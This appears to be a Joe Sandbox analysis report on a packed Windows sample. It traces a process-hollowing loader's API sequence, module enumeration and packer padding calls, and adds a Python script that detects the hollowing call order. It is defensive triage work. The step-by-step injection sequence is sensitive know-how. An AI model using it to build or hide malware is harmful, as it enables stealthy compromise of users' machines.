8165->8166 8167 40b545 __NMSG_WRITE 56 API calls 8166->8167 8168 4078d7 8167->8168 8169 407891 _abort 56 API calls 8168->8169 8170 4078e2 8169->8170 8172 40c4af _wparse_cmdline 8171->8172 8173 4099b7 __malloc_crt 56 API calls 8172->8173 8174 40c4f2 _wparse_cmdline 8172->8174 8173->8174 8174->8060 8176 40773b _doexit 56 API calls 8175->8176 8177 40788c 8176->8177 8177->8079 8179 40773b _doexit 56 API calls 8178->8179 8180 4078b2 8179->8180 8180->8082 8183 409a05 8181->8183 8184 409a42 8183->8184 8185 409a23 Sleep 8183->8185 8186 410854 8183->8186 8184->8087 8185->8183 8187 410860 8186->8187 8188 41087b _malloc 8186->8188 8187->8188 8189 41086c 8187->8189 8190 41088e HeapAlloc 8188->8190 8193 4108b5 8188->8193 8194 40ace6 8189->8194 8190->8188 8190->8193 8193->8183 8197 40a751 GetLastError 8194->8197 8196 40aceb 8196->8183 8209 40a62c TlsGetValue 8197->8209 8200 40a7be SetLastError 8200->8196 8201 4099fc __calloc_crt 53 API calls 8202 40a77c 8201->8202 8202->8200 8203 40a7b5 8202->8203 8204 40a79d 8202->8204 8226 40742e 8203->8226 8213 40a69d 8204->8213 8207 40a7a5 GetCurrentThreadId 8207->8200 8208 40a7bb 8208->8200 8210 40a641 TlsSetValue 8209->8210 8211 40a65c 8209->8211 8210->8211 8211->8200 8211->8201 8232 40b330 8213->8232 8215 40a6a9 GetModuleHandleW 8233 40b8de 8215->8233 8217 40a6e7 8240 40a73f 8217->8240 8220 40b8de __lock 55 API calls 8221 40a708 8220->8221 8243 40a2e1 InterlockedIncrement 8221->8243 8223 40a726 8255 40a748 8223->8255 8225 40a733 __mtinitlocknum 8225->8207 8227 407439 HeapFree 8226->8227 8231 407462 __dosmaperr 8226->8231 8228 40744e 8227->8228 8227->8231 8229 40ace6 __write_nolock 54 API calls 8228->8229 8230 407454 GetLastError 8229->8230 8230->8231 8231->8208 8232->8215 8234 40b8f3 8233->8234 8235 40b906 EnterCriticalSection 8233->8235 8258 40b81c 8234->8258 8235->8217 8237 40b8f9 8237->8235 8238 4078c5 __amsg_exit 55 API calls 8237->8238 8239 40b905 8238->8239 8239->8235 8376 40b805 LeaveCriticalSection 8240->8376 8242 40a701 
8242->8220 8244 40a302 8243->8244 8245 40a2ff InterlockedIncrement 8243->8245 8246 40a30c InterlockedIncrement 8244->8246 8247 40a30f 8244->8247 8245->8244 8246->8247 8248 40a319 InterlockedIncrement 8247->8248 8249 40a31c 8247->8249 8248->8249 8250 40a326 InterlockedIncrement 8249->8250 8252 40a329 8249->8252 8250->8252 8251 40a342 InterlockedIncrement 8251->8252 8252->8251 8253 40a352 InterlockedIncrement 8252->8253 8254 40a35d InterlockedIncrement 8252->8254 8253->8252 8254->8223 8377 40b805 LeaveCriticalSection 8255->8377 8257 40a74f 8257->8225 8259 40b828 __mtinitlocknum 8258->8259 8260 40b84e 8259->8260 8283 40b6f4 8259->8283 8269 40b85e __mtinitlocknum 8260->8269 8316 4099b7 8260->8316 8266 40b844 8313 407623 8266->8313 8267 40b870 8271 40ace6 __write_nolock 55 API calls 8267->8271 8268 40b87f 8272 40b8de __lock 55 API calls 8268->8272 8269->8237 8271->8269 8273 40b886 8272->8273 8274 40b8b9 8273->8274 8275 40b88e InitializeCriticalSectionAndSpinCount 8273->8275 8278 40742e _free 55 API calls 8274->8278 8276 40b8aa 8275->8276 8277 40b89e 8275->8277 8321 40b8d5 8276->8321 8279 40742e _free 55 API calls 8277->8279 8278->8276 8280 40b8a4 8279->8280 8282 40ace6 __write_nolock 55 API calls 8280->8282 8282->8276 8324 411ade 8283->8324 8285 40b6fb 8286 40b708 8285->8286 8287 411ade __NMSG_WRITE 56 API calls 8285->8287 8288 40b545 __NMSG_WRITE 56 API calls 8286->8288 8290 40b72a 8286->8290 8287->8286 8289 40b720 8288->8289 8291 40b545 __NMSG_WRITE 56 API calls 8289->8291 8292 40b545 8290->8292 8291->8290 8293 40b566 __NMSG_WRITE 8292->8293 8294 40b682 8293->8294 8295 411ade __NMSG_WRITE 53 API calls 8293->8295 8294->8266 8296 40b580 8295->8296 8297 40b691 GetStdHandle 8296->8297 8298 411ade __NMSG_WRITE 53 API calls 8296->8298 8297->8294 8301 40b69f _TestDefaultLanguage 8297->8301 8299 40b591 8298->8299 8299->8297 8300 40b5a3 8299->8300 8300->8294 8331 411a7b 8300->8331 8301->8294 8304 40b6d5 WriteFile 8301->8304 8304->8294 8305 40b5cf GetModuleFileNameW 8306 40b5f0 
Control-flow graph data (serialized edge list of the interactive graph; node numbers are graph-internal and carry no meaning outside the viewer). The call chains recoverable from it:

• 0x930000 chain, outside the image mapped at 0x400000 (i.e. in dynamically allocated memory): 0x9305e2 GetFileAttributesA; 0x9304ff CreateWindowExA; 0x930540 PostMessageA; 0x930110 VirtualAlloc, GetModuleFileNameA; 0x93017d CreateProcessA; 0x93025f VirtualFree, VirtualAlloc, Wow64GetThreadContext; 0x9302a9 ReadProcessMemory; 0x9302d5 NtUnmapViewOfSection; 0x9302e5 VirtualAllocEx, NtWriteVirtualMemory; 0x930350 NtWriteVirtualMemory (looped from 0x93033b, one iteration per region written); 0x93039d WriteProcessMemory, Wow64SetThreadContext, ResumeThread; 0x9303fb ExitProcess. This is the classic process-hollowing (RunPE) order: create a child with CreateProcessA, read its context and headers, unmap the original image with NtUnmapViewOfSection, allocate and write the replacement image, redirect the thread context with Wow64SetThreadContext, resume the thread, then exit the parent.
• 0xac2ad0 chain, also outside the mapped image: 0xac32a4 CreateToolhelp32Snapshot; 0xac32c0 Module32First; 0xac2f7b VirtualAlloc (loop at 0xac2fb3). Module enumeration followed by allocation, consistent with a stage that walks loaded modules before unpacking the next payload.
• 0x4257e0, in the original image: the long run of unrelated APIs listed in the control-flow graph and APIs sections below.
• All remaining nodes are internals of the statically linked MSVC runtime: _malloc/_realloc/_free (HeapAlloc, HeapReAlloc, HeapSize, Sleep in the __malloc_crt/__realloc_crt retry loops), __write/__write_nolock (WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, SetFilePointer, GetLastError), __lock/__mtinitlocknum (EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection), __init_pointers/_setlocale/_LocaleUpdate (EncodePointer, DecodePointer, InterlockedDecrement), the __init routine at 0x4117b2 (LoadLibraryW, GetProcAddress), __CxxThrowException@8 (RaiseException), the exit paths (GetModuleHandleW, GetProcAddress, ExitProcess, TlsFree), and __invoke_watson/_abort via __call_reportfault at 0x40ab19 (IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess).

Caveat for triage: the IsDebuggerPresent call in this image sits in the CRT's __call_reportfault path, which every MSVC-linked binary carries; on its own it is not evidence of anti-debugging logic in the sample. The behaviour of interest is in the 0x930000 and 0xac2ad0 regions.

Control-flow Graph

Function at 0x4257e0 (basic blocks 0x4257e0 to 0x425d1e). The report colours each block as executed or not executed; that colouring does not survive in text form. Blocks in address order with the APIs they call (block addresses are the report's; "call" marks internal functions):

• 0x4257e0: call 0x412100
• 0x42580e: CharToOemBuffA
• 0x425822: GetConsoleProcessList
• 0x425856: WriteProfileStringW
• 0x425877: RegisterClassA
• 0x42588b: SetThreadContext, GetFileAttributesExA
• 0x4258aa: call 0x407468 (_fputc), call 0x405590, call 0x407891
• 0x4258ff: GetConsoleAliasW, WriteConsoleOutputCharacterA, GetFileType
• 0x42592b: GlobalAlloc
• 0x425967: GetWindowsDirectoryW, SetThreadAffinityMask, ReadConsoleOutputCharacterA, SetProcessShutdownParameters, BuildCommDCBAndTimeoutsW
• 0x4259c6: call 0x4252a0 (9 API calls)
• 0x4259d5: GetVolumeInformationW, GetConsoleAliasA, SetProcessShutdownParameters
• 0x425a25: GetPrivateProfileStringW
• 0x425a6d: AddAtomA, GetSystemWindowsDirectoryW, DisconnectNamedPipe, GetConsoleCursorInfo
• 0x425a99: VirtualProtect, call 0x4255c0 (ReadConsoleInputA, WriteConsoleInputW, GlobalGetAtomNameA, GetCommandLineW, MoveFileWithProgressA, FindFirstFileW)
• 0x425adc: InterlockedDecrement, GetCharWidthFloatW, ClearEventLogA, GlobalUnfix, OpenWaitableTimerW
• 0x425b0d: GlobalFlags, LocalFlags
• 0x425b39: LoadLibraryW
• 0x425c14: GetConsoleCursorInfo, SetConsoleCP, TerminateProcess, FindFirstFileA, GetVolumeNameForVolumeMountPointA, GetModuleHandleW, CreateActCtxA, _lclose, ReadConsoleW, GetNamedPipeHandleStateW, GetModuleHandleA, CreateEventA, ExpandEnvironmentStringsW, SetProcessAffinityMask, SetTimeZoneInformation, ActivateActCtx, DeleteVolumeMountPointA
• 0x425d15: return

A mix of this many unrelated console, profile, atom, volume and event-log APIs in one function, fed constant nonsense arguments (see the argument strings in the APIs list below), is consistent with packer-generated padding whose purpose is to bloat the import table and defeat import-based heuristics rather than to do anything. Apart from VirtualProtect at 0x425a99 and LoadLibraryW at 0x425b39, none of these calls plays a role in the injection chain described in the control-flow data above.
                                                                                          APIs
                                                                                          • CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00425814
                                                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425826
                                                                                          • WriteProfileStringW.KERNEL32(masamey,rajuk,wedum), ref: 00425865
                                                                                          • RegisterClassA.USER32(5A1C619F), ref: 0042587C
                                                                                          • SetThreadContext.KERNEL32(00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042588F
                                                                                          • GetFileAttributesExA.KERNEL32(harovule kitodilibuyaheyujetuwojuxil rixafihijotolini tisujovotu,00000000,?,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 004258A4
                                                                                          • _fputc.LIBCMT ref: 004258AE
                                                                                          • GetConsoleAliasW.KERNEL32(00000000,00000000,00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258), ref: 00425907
                                                                                          • WriteConsoleOutputCharacterA.KERNEL32(00000000,bevohurabijaso,00000000,00000000,072348D9,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042591C
                                                                                          • GetFileType.KERNEL32(00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00425920
                                                                                          • GlobalAlloc.KERNEL32(00000000,?,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425934
                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00425971
                                                                                          • SetThreadAffinityMask.KERNEL32(00000000,00000000), ref: 00425977
                                                                                          • ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,00000000,072348D9,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042598F
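The Python below is an added example, not part of the Joe Sandbox report or of the sample. It parses API-call lines in the report's listing format (name.MODULE(args), ref: address, including the argument-less CRT form such as _fputc.LIBCMT) and walks the calls in order looking for the process-hollowing sequence that the 0x930110 to 0x9303fb chain above shows. The hollowing trace embedded in the script is constructed: the API names and block addresses are taken from that chain, but the report does not show their arguments, so they are written as "?". The second embedded listing is a subset of the 0x4257e0 APIs above and shows that the lone SetThreadContext in that padding function does not trigger the detector. The detector assumes the lines are in execution order, which for this chain coincides with address order; a live sandbox trace should be fed per thread.

```python
"""Added example (not part of the Joe Sandbox report or of the sample):
parse API-call lines in the report's listing format and look for the
process-hollowing call order seen in the 0x930110..0x9303fb chain."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches "• GlobalAlloc.KERNEL32(00000000,?), ref: 00425934" and the
# argument-less CRT form "• _fputc.LIBCMT ref: 004258AE".
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int  # call-site address


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the API calls in listing order; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


# Each stage lists the alternative APIs a loader can use for that step; the
# stages must appear in this order. NtUnmapViewOfSection is recorded but not
# required: some loaders keep the original image mapped and use a new region.
HOLLOWING_STAGES = [
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext"},
    {"ResumeThread", "NtResumeThread"},
]


def find_hollowing_sequence(calls: List[ApiCall]) -> Optional[dict]:
    """Walk the calls in order; return the call site that satisfied each stage,
    or None when the full sequence is absent (a lone SetThreadContext is not enough)."""
    stage_refs: List[int] = []
    unmapped = False
    for c in calls:
        if c.name == "NtUnmapViewOfSection":
            unmapped = True
        if len(stage_refs) < len(HOLLOWING_STAGES) and c.name in HOLLOWING_STAGES[len(stage_refs)]:
            stage_refs.append(c.ref)
    if len(stage_refs) < len(HOLLOWING_STAGES):
        return None
    return {"stage_refs": stage_refs, "unmapped_original_image": unmapped}


# Constructed from the 0x930110..0x9303fb chain in the report's graph data:
# names and block addresses are the report's, the arguments are not shown there.
HOLLOWING_TRACE = """\
• VirtualAlloc.KERNEL32(?), ref: 00930110
• GetModuleFileNameA.KERNEL32(?), ref: 00930110
• CreateProcessA.KERNEL32(?), ref: 0093017D
• VirtualFree.KERNEL32(?), ref: 0093025F
• VirtualAlloc.KERNEL32(?), ref: 0093025F
• Wow64GetThreadContext.KERNEL32(?), ref: 0093025F
• ReadProcessMemory.KERNEL32(?), ref: 009302A9
• NtUnmapViewOfSection.NTDLL(?), ref: 009302D5
• VirtualAllocEx.KERNEL32(?), ref: 009302E5
• NtWriteVirtualMemory.NTDLL(?), ref: 009302E5
• NtWriteVirtualMemory.NTDLL(?), ref: 00930350
• WriteProcessMemory.KERNEL32(?), ref: 0093039D
• Wow64SetThreadContext.KERNEL32(?), ref: 0093039D
• ResumeThread.KERNEL32(?), ref: 0093039D
• ExitProcess.KERNEL32(?), ref: 009303FB
"""

# First seven entries of the 0x4257e0 listing, copied from the report.
SAMPLE_REPORT_APIS = """\
• CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00425814
• GetConsoleProcessList.KERNEL32(00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425826
• WriteProfileStringW.KERNEL32(masamey,rajuk,wedum), ref: 00425865
• RegisterClassA.USER32(5A1C619F), ref: 0042587C
• SetThreadContext.KERNEL32(00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042588F
• GetFileAttributesExA.KERNEL32(harovule kitodilibuyaheyujetuwojuxil rixafihijotolini tisujovotu,00000000,?,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 004258A4
• _fputc.LIBCMT ref: 004258AE
"""

if __name__ == "__main__":
    print(find_hollowing_sequence(parse_api_lines(HOLLOWING_TRACE)))
    print(find_hollowing_sequence(parse_api_lines(SAMPLE_REPORT_APIS)))
```

The stage sets are deliberately loose (Nt* and Win32 spellings, Wow64 variants) because a 32-bit loader on a 64-bit host, as here, uses the Wow64 context calls; requiring an exact API name would miss it. Ordering is what makes the match meaningful: SetThreadContext appears in the padding function too, but with no preceding CreateProcess and GetThreadContext it is reported as nothing.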
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Console$CharacterFileOutputThreadWrite$AffinityAliasAllocAttributesBuffCharClassContextDirectoryGlobalListMaskProcessProfileReadRegisterStringTypeWindows_fputc
                                                                                          • String ID: bajudomipofomayaramebetec$bevohurabijaso$harovule kitodilibuyaheyujetuwojuxil rixafihijotolini tisujovotu$masamey$nesubunemujikiyironatayimaba$nifawoxasexasikuducunojuzufufozoluhu$paririzegeyesavimiz$pivajogetecuboxafilubo$pudimutipegizapejo$rajuk$viguzanoba$wedum$wisadugebejazejoweriseb nor$LwP<Mw`Lw
                                                                                          • API String ID: 1579132369-3195660827
                                                                                          • Opcode ID: d877436c784190c928727750bb7d3effe1c5fbbd43bdc0cee339242b01f40efd
                                                                                          • Instruction ID: 5f7f87ac16b498cbc6373e6cf3bd9bd595ac9e1fcbf9491703df2ca55b9bcc60
                                                                                          • Opcode Fuzzy Hash: d877436c784190c928727750bb7d3effe1c5fbbd43bdc0cee339242b01f40efd
                                                                                          • Instruction Fuzzy Hash: 40D1C671644350ABE310DFA0ED86F9B77A4EB48B01F40463AF745EB1E0DAB85584CB6E

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00930156
                                                                                          • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0093016C
                                                                                          • CreateProcessA.KERNELBASE(?,00000000), ref: 00930255
                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00930270
                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00930283
                                                                                          • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0093029F
                                                                                          • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 009302C8
                                                                                          • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 009302E3
                                                                                          • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00930304
                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0093032A
                                                                                          • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00930399
                                                                                          • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 009303BF
                                                                                          • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 009303E1
                                                                                          • ResumeThread.KERNELBASE(00000000), ref: 009303ED
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00930412
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1510573281.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_930000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                          • String ID:
                                                                                          • API String ID: 93872480-0
                                                                                          • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                          • Instruction ID: 4f2c1ffc1b42a8ad0614e5e96efe88289cf86dce1fb06a548eb0cfe1d66dd647
                                                                                          • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                          • Instruction Fuzzy Hash: 72B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94

                                                                                          Control-flow Graph

                                                                                          • Graph image not recoverable; basic blocks ac3280-ac32de, calling CreateToolhelp32Snapshot, Module32First and subroutine ac2f3f
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AC32A8
                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00AC32C8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_abd000_e6reA52T4I.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3833638111-0
                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                          • Instruction ID: 74fe069bbfee8d917d72963a056699df594db7bef76686fc98f2ac1d78f719fa
                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                          • Instruction Fuzzy Hash: 94F062326007146FEF203BB9A88DFAAB6E8BF59724F51452CE642915C0DB70E9454A61

                                                                                          Control-flow Graph

                                                                                          • Graph image not recoverable; basic blocks 930420-9305ad, calling CreateWindowExA, PostMessageA and subroutine 930110
                                                                                          APIs
                                                                                          • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00930533
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1510573281.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_930000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                          • API String ID: 716092398-2341455598
                                                                                          • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                          • Instruction ID: 81bdb3ff6580dddefec5411341675ebd6a3c8ed99155605c9607830823645fd9
                                                                                          • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                          • Instruction Fuzzy Hash: B6511870D083C8DAEB11CBE8C859BDDBFB6AF51708F144058E5447F286C3BA5A58CB66

                                                                                          Control-flow Graph

                                                                                          • Graph image not recoverable; basic blocks 9305b0-930621, calling GetFileAttributesA and subroutine 930420
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNELBASE(apfHQ), ref: 009305EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1510573281.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_930000_e6reA52T4I.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID: apfHQ$o
                                                                                          • API String ID: 3188754299-2999369273
                                                                                          • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                          • Instruction ID: 9ea48b616e369e8361f440ff1929f93c4ee2a3bc451a730b733f6c5ee01a0c88
                                                                                          • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                          • Instruction Fuzzy Hash: F4012170C0424CEEDF14DB98C5193AEBFB5AF81308F1481D9D4092B242D7769B58CFA1

                                                                                          Control-flow Graph

                                                                                          • Graph image not recoverable; basic blocks ac2f3f-ac2fc7, calling VirtualAlloc and subroutines ac3252 and ac2fcc
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AC2F90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_abd000_e6reA52T4I.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                          • Instruction ID: f9d73a25ec8f844db20eafa8f35ac1c5d224ad53ee8cc7cc66b44a73baa304be
                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                          • Instruction Fuzzy Hash: 2F113F79A00208EFDB01DF98C985E98BBF5AF08350F068094F9489B361D371EA50DF90

                                                                                          Control-flow Graph

                                                                                          • Graph image not recoverable; basic blocks 425d20-4272f7, calling CharUpperA, GetTempPathW and subroutine 4257e0
                                                                                          APIs
                                                                                          • CharUpperA.USER32(00000000,3ADE7A91,698C5357,41D8CE48,25C1687E,418F6582,698C5357,048B4B8D,17C9A0AF,6F52AFFE,22C9DDBD,566AD047,68316C5B,3158AF5F,1CE65E10,25213482), ref: 00426CB3
                                                                                            • Part of subcall function 004257E0: CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00425814
                                                                                            • Part of subcall function 004257E0: GetConsoleProcessList.KERNEL32(00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425826
                                                                                            • Part of subcall function 004257E0: RegisterClassA.USER32(5A1C619F), ref: 0042587C
                                                                                            • Part of subcall function 004257E0: SetThreadContext.KERNEL32(00000000,00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 0042588F
                                                                                            • Part of subcall function 004257E0: GetFileAttributesExA.KERNEL32(harovule kitodilibuyaheyujetuwojuxil rixafihijotolini tisujovotu,00000000,?,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 004258A4
                                                                                            • Part of subcall function 004257E0: _fputc.LIBCMT ref: 004258AE
                                                                                            • Part of subcall function 004257E0: GetConsoleAliasW.KERNEL32(00000000,00000000,00000000,00000000,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258), ref: 00425907
                                                                                            • Part of subcall function 004257E0: WriteConsoleOutputCharacterA.KERNEL32(00000000,bevohurabijaso,00000000,00000000,072348D9,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 0042591C
                                                                                            • Part of subcall function 004257E0: GetFileType.KERNEL32(00000000,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077), ref: 00425920
                                                                                            • Part of subcall function 004257E0: GlobalAlloc.KERNEL32(00000000,?,1FF896F3,7706BF00,?,?,?,004272CB,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00425934
                                                                                          • GetTempPathW.KERNEL32(00000000,011C8B1D,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80,07780C44,31630C95,65DCD057,6496216E), ref: 004272E3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1508609549.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1508596131.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509533993.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509549523.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509563679.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_e6reA52T4I.jbxd
                                                                                          Similarity
